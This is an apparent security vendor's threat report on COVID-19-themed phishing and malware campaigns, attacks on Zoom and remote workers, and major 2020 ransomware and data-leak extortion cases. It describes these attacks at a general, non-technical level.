COVID-19 themed exploitations
The COVID-19 pandemic, which started at the very end of 2019, had a dramatic effect on our lives
around the world. But apart from the obvious dangers to human health and a huge economic impact,
the pandemic changed the digital world, the way we work, and the way we spend our free time online.
As travel ceased, most businesses and services had to switch to online operations. The ones who
already were online had to expand, others had to introduce completely new processes. Government,
medical, and service organizations had to adopt new means to meet everyday needs.
Business meetings migrated to telecommunication apps like Zoom, Webex, and Microsoft Teams,
which became the new standard. Office workers were sent home, often in a rush and without proper
support, resorting to their own equipment to perform their work.
Unfortunately, cybercriminals saw clear opportunities in these challenges and actively increased their
attacks, leaving human compassion and mercy behind.
As expected, people rushed online to get information about the new pandemic: how they
can protect themselves, what the latest news is, what assistance they can count on, and so on.
This interest resulted in a huge number of scams and other kinds of exploits. Cybercriminals
continue to use old tricks to exploit the COVID-19 theme in their cyberattacks, tricking victims
to enter their credentials or personal information on a phishing web page, or loading malicious
payloads into documents that pretend to contain essential information related to the pandemic.
There are other notable approaches, and the following examples are some of the COVID-19
themed scams encountered.
Fake free testing
The latest version of Trickbot/Qakbot/Qbot malware was spread in numerous phishing emails
that offered free COVID-19 testing. Victims were asked to fill out an attached form, which turned out
to be a fake document embedded with a malicious script. To avoid revealing its payload in malware
sandboxes, the script wouldn’t start downloading its payload until after some time had passed.
The lure document uses a standard gimmick to trick users into clicking ‘Enable content’ which
allows the execution of the malicious VBA script that is embedded.
Fake financial support
In many cases, cyberattacks stayed local based on how the country was hit by COVID-19. For
instance, the state of North Rhine-Westphalia (NRW) in Germany fell victim to a phishing
campaign. Attackers created rogue copies of the NRW Ministry of Economic Affairs’ website for
requesting COVID-19 financial aid. The fraudsters collected the personal data submitted by victims
and then submitted their own requests to the legitimate website using the victims’ information
but the criminals’ bank account. NRW officials reported that up to 4,000 fake requests had been
granted, resulting in up to $109 million being sent to the scammers.
Scams around remote education
Criminals also focused on exploiting based on remote education. A new pandemic-themed
phishing email delivered a Formbook Trojan embedded into a bogus grading application for
school teachers. Formbook is a type of infostealer malware capable of stealing login credentials
from internet browsers. It has been promoted on hacking forums since February 2016.
Interestingly, the attackers employed several anti-analysis and anti-detection techniques such as
sandbox detection and virtual machine detection, steganography, and XOR encryption to hide the
payload, thereby effectively evading Windows Defender.
The criminals behind Formbook campaigns have also been known to attack biomedical firms to
steal financial resources, sensitive personal data, and intellectual property.
Fake medical leave documents
The Trickbot campaign also exploited COVID-19 pandemic fears to spread a malicious
document entitled: “Family and Medical Leave of Act 22.04.doc”
The authentic Family Medical Leave Act (FMLA) provides employees the right to have medical
leave benefits. However, once the user activates the macro in these fraudulent documents,
malicious script starts downloading additional malware onto the computer.
Chasing governments’ and private companies’ COVID-19 secrets
Certain valuable data related to the COVID-19 pandemic and suspected by some analysts
to have been kept secret by the Chinese government is attracting hackers from around
the world. For example, the Vietnamese state sponsored hacking group APT32 (also known
as the OceanLotus Group) reportedly attacked Chinese state organizations hoping to steal virus
control measures, medical research, and statistics revealing the number of infections that allegedly
have not been disclosed by China. Vietnam is a neighbor of China and its interest in part appears
to be motivated by its desire to control the spread of the pandemic around the region.
The Chinese company Huiying Medical, which is purported to have developed AI that can
diagnose COVID-19 based on computed tomography (CT) scanning images with 96% accuracy,
was allegedly hacked. According to cybersecurity firm Cyble, a hacker dubbed “THE0TIME”
put Huiying Medical data up for sale on the Dark Web that may contain user information,
source code, and reports on experiments at an asking price of four bitcoin
(approx. $30,000 at the time). Other ATP groups attacked pharmaceutical companies
and vaccination laboratories in order to steal relevant data.
Remote workers under attack
The COVID-19 pandemic has significantly changed the threat landscape, highlighting
numerous security and privacy risks associated with remote work operations – including
remote access to internal company servers, virtual conferencing, and security training
• Nearly half of all IT managers struggled to instruct and secure remote workers.
• 31% of global companies are attacked by cybercriminals at least once a day.
The most common attack types were phishing attempts, DDoS attacks, and videoconferencing attacks.
• 92% of global organizations had to adopt new technologies to complete the switch to remote
work. As a result, 72% of global organizations saw their IT costs increase during the pandemic.
• Successful attacks remain frequent, despite increased tech spending, because
organizations aren’t prioritizing defensive capabilities properly.
• 39% of all companies reported video conferencing attacks during the pandemic.
(Source: Acronis Survey amongst 3.400 companies and remote workers from all around the world in 2020)
Coronavirus increases Zoom attacks
The onset of the COVID-19 pandemic saw the Zoom virtual conferencing platform attracting
unwanted attention from cybercriminals. With the increased user base, more and more people
started analyzing the Zoom code for weaknesses and raising privacy concerns.
For example, Vice.com reported that two zero-day vulnerabilities – security holes that vendors
were not aware of and thus had no patches for – were available on the Dark Web market: one for Windows
and another for macOS. The Zoom Windows RCE (Remote Code Execution) exploit was for sale for $500,000.
Zoom also became the target of a phishing campaign aimed at stealing service credentials.
Phishing emails were delivered to more than 50,000 mailboxes, targeting Microsoft 365 users
with a fake email invitation to an upcoming Zoom call with the human resources department to
discuss a performance review (a topic designed to induce anxiety in the victim that might crowd
out their normal wariness of clicking on an email link). Such phishing attacks, in combination with
credential stuffing attacks where attackers check if the user shared the same password on multiple
services, led to over 500,000 Zoom user credentials floating around on underground forums.
The fact that many Zoom videoconferences didn’t have a password set also attracted cybercriminals.
People started trying out all possible meeting ID numbers, till they found an ongoing meeting call.
They then joined the call and disturbed the participants by playing videos, loud music, or
other inappropriate materials.
These Zoom-bombing attacks led to many schools stopping their remote teaching programs.
Not only Zoom: Microsoft 365 users were attacked as well. Of course, Zoom was not the only
Collaboration tool in the crosshairs of the attackers. Similar attacks happened to
Microsoft Teams and Webex.
Lack of security for work-from-home staff
Now that some people have to work from home on their own computers security threats are
rampant. Not only do those home machines often lack effective cyber protection, but many
users also don’t regularly apply the latest security patches for their operating system and popular
third-party software, leaving their machines vulnerable. Many of these private machines are
not managed by the IT department and therefore no company policies are applied to them.
Covering these vulnerabilities and patch management issues on the edge became a headache
for admins and technicians that provide the IT support to help small businesses survive during
In addition to this, home networks are often exposed to other unprotected devices, often
from kids and other members of the family. Furthermore, the broadband router is often
outdated, allowing attackers to hijack the router and potentially redirect specific traffic.
Ransomware is still the number one threat
Clearly, 2020 has been a year of ransomware with more attacks, higher losses, and new extortion
techniques being implemented by cybercriminals. Big cases become public practically every week.
According to a report published by Coalition, one of the largest providers of cyber insurance
services in North America, ransomware cases have accounted for 41% of cyber insurance claims
filed in the first half of 2020. “Ransomware doesn’t discriminate by industry. We’ve seen an
increase in ransom attacks across almost every industry we serve,” reports Coalition.
Big targets bring big ransoms
On July 18, Argentina’s largest telecom provider was hit by a ransomware attack — likely by the
Sodinokibi group — demanding a $7.5 million ransom. As is typical of many attackers who want
to force a quick decision from the victim, this demand was set to double if not paid within 48
hours. The ransomware allegedly infected more than 18,000 workstations, including terminals with
highly sensitive data.
Garmin, one of the world’s largest wearable device companies, confirmed that the major outage
that began on July 24 was due to a WastedLocker ransomware attack. This attack forced Garmin to
halt contact center operations, Garmin Connect, and even production lines in Taiwan. With an
estimated $4 billion in annual revenue, Garmin is certainly a high-value target. The requested ransom
amount is believed to be $10 million. Other recent WastedLocker attacks have demanded amounts
ranging from $500,000 to millions. The list of high-ransom victims goes on. In February, the
FBI published estimates for the profits of some ransomware groups. The list indicated that groups
like Ryuk made about $3 million per month in 2019. With paydays like that, it’s unlikely that the
threat will decrease anytime soon.
What’s more, modern ransomware families not only demand a ransom for decrypting data but
also for not disclosing stolen confidential data to the public, which increases their chances of
a payout even more.
Demanding ransom for non-disclosure
The REvil/Sodinokibi ransomware group announced on August 14 that they had compromised
the Kentucky-based Brown-Forman — the parent company of whiskey brands Jack Daniels, Old Forester,
The Glendronach, and various other wines and spirits. With a 2020 annual report showing gross
profits of more than $2 billion and a net income of $872 million, Brown-Forman is an undeniably
high-value target for ransomware operators. The REvil group claimed to have stolen 1TB of data,
including confidential employee information, financial data, internal communications, and
company agreements. Images posted on their leak site indicate that they possess data dating back at
least as far as 2009.
Canon, the multinational corporation specializing in optical and imaging products, fell victim to a
Maze ransomware attack that impacted their email system, Microsoft Teams, their U.S. website,
and other internal applications. The Maze ransomware operators stated that they stole more than
10TB of data from Canon, including private databases. Canon acknowledged the attack in an
internal message sent to employees.
CWT, one of the world’s largest travel and event management companies, was compromised by
the Ragnar Locker ransomware. The attackers allegedly stole 2TB of sensitive corporate data and
claim to have compromised more than 30,000 systems. While the attackers initially demanded
$10 million for the safe return of stolen data, CWT entered negotiations and eventually agreed to pay
a ransom of 414 bitcoin — equal to more than $4 million at the time of writing.
Conti, a new ransomware as a service (RaaS) and the successor of the notorious Ryuk variant,
released a data leak website as part of its extortion strategy to force victims into paying a ransom.
While Conti has been active for several months, it wasn’t until recently that the cybercriminals publicly
released a data leak site where they threaten to publish victims’ stolen data if the demanded ransom
is not paid. “Conti.News” currently lists 112 victims, including large and well-known companies.
In total, about 20 different ransomware groups have created dedicated pages for data leaks, hosted
on the Tor underground network. More than 700 companies have had their data published – 37% of
leaks came from Maze ransomware infections, followed by Conti with 15%, and Sodinokibi with 12%.
These data breaches can result in reputation loss, follow-up attacks, and various fines. Plus, the
leak of customer data might be punishable under privacy regulations such as GDPR or CCPA, and
paying the ransom could be an offense under the U.S. OFAC regulation.